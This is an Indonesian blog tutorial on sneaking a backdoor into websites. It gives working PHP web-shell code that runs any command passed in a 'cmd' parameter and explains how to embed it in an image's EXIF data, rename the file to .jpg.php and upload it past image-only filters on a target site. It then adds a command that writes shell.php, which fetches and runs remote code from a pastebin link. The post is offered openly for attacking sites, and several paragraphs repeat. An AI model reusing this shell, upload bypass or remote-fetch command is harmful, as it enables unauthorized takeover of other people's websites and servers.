Cara Menyisip Backdoor ke Website 2024
Jumat, 04 Oktober 2024
Tulis Komentar
Cara Menyisip Backdoor ke Website - Seperti yang diketahui bersama, Backdoor adalah jalan pintas pada sebuah sistem yang keamanan sistem yang digunakan oleh para hacker untuk akses masuk ke dalam system lain.
Kemungkinan sebagian dari kita pernah masuk ke dalam sistem website atau dashboar, namun ketika mengupload shell tidak bisa, karena file yang diperbolehkan adalah image only.
Tentu masalah tersebut akan membuat Anda merasa terganggu, apalagi saat kondisi mendesak, karena harus menyelesaikan tugas atau pekerjaan
Walaupun telah ditamper, shell tersebut tetap tidak bisa dikirim, sehingga membutuhkan cara atau trik khusus.
Nah, salah satu cara atau trik khusus yang bisa dilakukan untuk mengatasi masalah tersebut adalah dengan menyisipkan backdoor ke website guys.
Lalu bagaimana caranya menyisipkan atau membypass backdoor tersebut ke website? Untuk caranya terbilang gampang-gampang susah guys.
Karena Anda perlu melakukan beberapa langkah dan harus memasukkan kode perintah dengan baik dan benar.
Pasti penasaran kan bagaimana caranya? Agar tidak semakin penasaran, yuk langsung saja simak ulasan berikut ini tentang cara menyisip backdoor ke website.
Demikian cara untuk menyisipkan backdoor ke website yang bisa dipelajari dan diterapkan guys.
Karena satu langkah saja yang terlewatkan, bisa dipastikan proses yang Anda lakukan akan gagal guys.
Tentu masalah tersebut akan membuat Anda merasa terganggu, apalagi saat kondisi mendesak, karena harus menyelesaikan tugas atau pekerjaan
Walaupun telah ditamper, shell tersebut tetap tidak bisa dikirim, sehingga membutuhkan cara atau trik khusus.
Nah, salah satu cara atau trik khusus yang bisa dilakukan untuk mengatasi masalah tersebut adalah dengan menyisipkan backdoor ke website guys.
Lalu bagaimana caranya menyisipkan atau membypass backdoor tersebut ke website? Untuk caranya terbilang gampang-gampang susah guys.
Karena Anda perlu melakukan beberapa langkah dan harus memasukkan kode perintah dengan baik dan benar.
Baca Juga : Cara Hack Website Sekolah dengan Termux
Pasti penasaran kan bagaimana caranya? Agar tidak semakin penasaran, yuk langsung saja simak ulasan berikut ini tentang cara menyisip backdoor ke website.
Cara Menyisip Backdoor ke Website
Adapun cara menyisip backdoor ke website terbaru sebagai berikut:
1. Menyiapkan bahan-bahan yang dibutuhkan
- Exif editor yang bisa didownload melalui link berikut ini (Download Exif Editor).
- Gambar yang akan disisipkan pada website.
- Code backdoor PHP:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>
Tips: Isilah link gambar dengan url gambar yang ingin Anda gunakan.
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="https://dummyimage.com/1280x510/000/fff.jpg" border=0>';}__halt_compiler();?></h1>
2. Proses menyisipkan backdoor
- Untuk langkah pertama, silahkan buka Exif Editor yang telah didownload sebelumnya.
- Lalu klik menu Open kemudian pilih gambar yang ingin Anda sisipkan pada Backdoor PHP.
- Selanjutnya klik gambar atau tanda plus (+).
- Kemudian isilah type sesuai dengan gambar serta value yang diinginkan dan klik Add.
- Silahkan lakukan klik 1 Pending Change > klik Edit Modification dan masukkan kode PHP yang ada di atas tadi ke dalam new Value kemudian klik Save.
- Lanjutkan langkah dengan memilih tempat penyimpanan gambar yang telah diinject tadi dan klik Save.
- Ubahlah exstensi gambar menjadi " namagambar.jpg.php" dan cobalah untuk mengeceknya menggunakan notepad ++, apakah sudah terinject atau belum.
- Setelah proses inject selesai dilakukan, Anda bisa mencoba untuk mengupload gambar ke website target dan jika berhasil mengupload, silahkan akses gambar tadi dengan memasukkan ?cmd= dibagian belakang nama gambar, misalnya target.com/mastahcyber.jpg.php?cmd=.
- Masukan perintah berikut "uname -a, misalnya ?cmd= uname -a dan bila muncul keterangan server target berarti proses yang dilakukan berhasil.
- Untuk mengeceknya, Anda bisa coba untuk mengupload shell menggunakan perintah di bawah ini:
- echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
- Agar lebih menyakinkan, Anda bisa mengakses shell yang telah diupload sebelumnya sesuai dengan nama shell, misalnya target.com/shell.php.
- Shell akan terupload dan Anda telah berhasil membypass nya guys.
Baca juga : Cara Hack Website dengan Android Termux
Agar proses penyisipan backdoor berhasil, silahkan perhatikan dan lakukan setiap langkah sesuai yang penjelasan di atas dengan baik dan benar.
Karena satu langkah saja yang terlewatkan, bisa dipastikan proses yang Anda lakukan akan gagal guys.
Itulah seluruh isi artikel kami kali ini mengenai cara menyisip backdoor ke website. Semoga bermanfaat dan selamat mencoba.
Tidak ada komentar:
Posting Komentar